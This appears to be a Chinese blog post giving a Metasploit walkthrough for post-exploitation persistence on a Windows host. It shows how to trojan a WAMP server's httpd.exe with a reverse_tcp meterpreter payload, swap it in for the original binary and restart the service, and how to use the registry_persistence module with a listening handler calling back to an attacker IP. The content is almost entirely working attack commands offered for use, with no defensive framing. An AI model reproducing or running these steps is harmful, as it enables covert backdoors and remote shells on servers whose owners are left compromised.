0x07 安装后门

一 在守护进行执行文件中注入后门

在获得meterpreter1之后安装后门的步骤

# 查看系统中有哪些进程,查看在哪些守护进程中安装后门
# 这里使用的服务器是wamp
ps -S httpd.exe

# 停止http服务进程
pkill httpd.exe

# 寻找改进程执行文件的位置
search -f httpd.exe -d C:\

# 下载该服务的执行文件
download C:\\httpd.exe

# 然后将meterpreter1放入后台
background

在服务器执行文件上安装后门

# 从meterpreter1返回到msfconsole
# 在服务执行文件上安装后门,默认端口4444
use payload/windows/x64/metepreter/reverse_tcp #后门上安装的shell
set lhost 192.168.10.115
generate -a x64 -p Windows -x httpd.exe -k -t exe -f http_backdoor.exe
后门制作结束
generate
-a 处理器架构
-p 操作系统平台
-x 后台使用的模板
-t 文件格式
-f 生成的后门文件

准备接受后台反弹的shell

use exploit/mulit/handler
set payload payload/windows/x64/metepreter/reverse_tcp # payload需要与后门上安装的相同
set lhost 192.168.10.115 #后门的shell只会发往115
exploit -j   # -j 允许在后台持续监听

进入meterpreter1安装后门

# 切换到服务执行文件所在的目录
cd C:\

# 将原始的服务执行文件备份
mv httpd.exe httpd-backup.exe

# 上传制作的后门文件
upload http_backdoor.exe

# 将后门文件更改为原先的名字
mv http_backdoor.exe httpd.exe

# 切换到目标机器的system sheel
shell

# 这个httpd是wampapache服务器的,停止wampapache,在开启wampapache
net stop wampapache
net start wampapache   #会直接启动httpd.exe

# 执行之后,系统就接受到了

二 在注册表中安装后门

# 前提要有一个meterpreter,这个meterpreter放入后天,假设session值为1
 use exploit/windows/local/registry_persistence 
set session 1 #目的是当前需要一个shell能够操作目标机器的注册表
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.115
exploit

# 需要在攻击机上监听可能返回的shell
use exploit/muilt/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.115
run -j  #进入后台监听

还有几个

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 官网 中文版本 好的网站 Content-type: text/htmlBASH Section: User ...
    不排版阅读 4,483评论 0 5
  • Ubuntu的发音 Ubuntu,源于非洲祖鲁人和科萨人的语言,发作 oo-boon-too 的音。了解发音是有意...
    萤火虫de梦阅读 99,612评论 9 467
  • 一、Python简介和环境搭建以及pip的安装 4课时实验课主要内容 【Python简介】: Python 是一个...
    _小老虎_阅读 5,846评论 0 10
  • 活着多好,能健健康康,平平安安长大已经不容易了。虽然瑞典的冬天漫长寂寞,有时真的要抑郁了。但是看到阳光那一刻又无比...
    渴望年轻阅读 289评论 0 0
  • 最近每天好像都纠结着三件事:晚上睡不着,早上起不来,后悔昨天睡太晚! 新年一过,好像这已经成为了一种通病。白天的时...
    小左十三阅读 172评论 1 1